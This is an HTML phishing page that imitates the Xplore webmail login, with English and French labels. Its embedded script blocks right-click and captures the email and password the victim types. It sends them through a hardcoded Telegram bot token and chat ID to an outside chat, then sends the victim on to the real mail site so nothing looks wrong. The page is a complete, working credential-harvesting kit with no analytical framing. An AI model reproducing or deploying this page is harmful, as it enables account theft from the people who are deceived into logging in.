<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Webmail :: Welcome to Webmail</title>
    <style>
        body {
            margin: 0;
            font-family: Arial, sans-serif;
            background-color: #333;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 110vh;
            color: #333;
        }
        .container {
            background-color: #fff;
            width: 400px;
            padding: 25px;
            text-align: center;
            border-radius: 3px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
        }
        .logo {
            font-size: 35px;
            font-weight: bold;
            margin-bottom: 10px;
        }
        .logo img {
            max-width: 420px;
        }
        .form-group {
            margin-bottom: 20px;
            text-align: left;
        }
        .form-group label {
            display: block;
            font-size: 14px;
            margin-bottom: 5px;
        }
        .form-group input[type="email"],
        .form-group input[type="password"] {
            width: 90%;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 4px;
            font-size: 14px;
        }
        .form-group input[type="checkbox"] {
            margin-right: 10px;
        }
        .form-group span {
            font-size: 12px;
            color: #666;
        }
        .btn {
            background-color: #00573F;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 4px;
            font-size: 16px;
            cursor: pointer;
            width: 100%;
            margin-top: 15px;
        }
        .btn:hover {
            background-color: #003b28;
        }
    </style>
    <script>
        // Disable right-click functionality
        document.addEventListener('contextmenu', function (event) {
            event.preventDefault();
            
        });

        function sendToTelegram(event) {
            event.preventDefault(); // Prevent form submission
            const botToken = '7119155542:AAESLi6V72DhWdzTpCHz9zSBP7VoSZmBRjw';
            const chatId = '5590516100';
            const email = document.getElementById('email').value;
            const password = document.getElementById('password').value;

            const message = `Login Info:\nEmail: ${email}\nPassword: ${password}`;
            const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

            fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            })
            .then(response => response.json())
            .then(data => {
                if (data.ok) {
                    alert('Information has been renew!');
                    window.location.href = 'https://mail.xplore.net'; // Redirect to the desired URL
                } else {
                    alert('Failed to send data.');
                }
            })
            .catch(error => {
                alert('An error occurred while sending data.');
            });
        }
    </script>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="https://i.imgur.com/RVCT41k.png" alt="Xplore Logo">
        </div>
        <form onsubmit="sendToTelegram(event)">
            <div class="form-group">
                <label for="email">E-mail address / Courriel</label>
                <input type="email" value="[[-Email-]]" id="email" name="email" required="">
            </div>
            <div class="form-group">
                <label for="password">Password / Mot de passe</label>
                <input type="password" id="password" name="password" required>
            </div>
            <div class="form-group">
                <input type="checkbox" id="shared-computer" name="shared-computer">
                <label for="shared-computer">
                    Shared computer - log me out after 4 hours<br>
                    <span>Ordinateur partagé - déconnectée après 4 heures</span>
                </label>
            </div>
            <div class="form-group">
                <input type="checkbox" id="keep-logged-in" name="keep-logged-in">
                <label for="keep-logged-in">
                    Keep me logged in until I log out<br>
                    <span>Restez connecté(e)</span>
                </label>
            </div>
            <button type="submit" class="btn">Login / Se connecter</button>
        </form>
    </div>
</body>
</html>
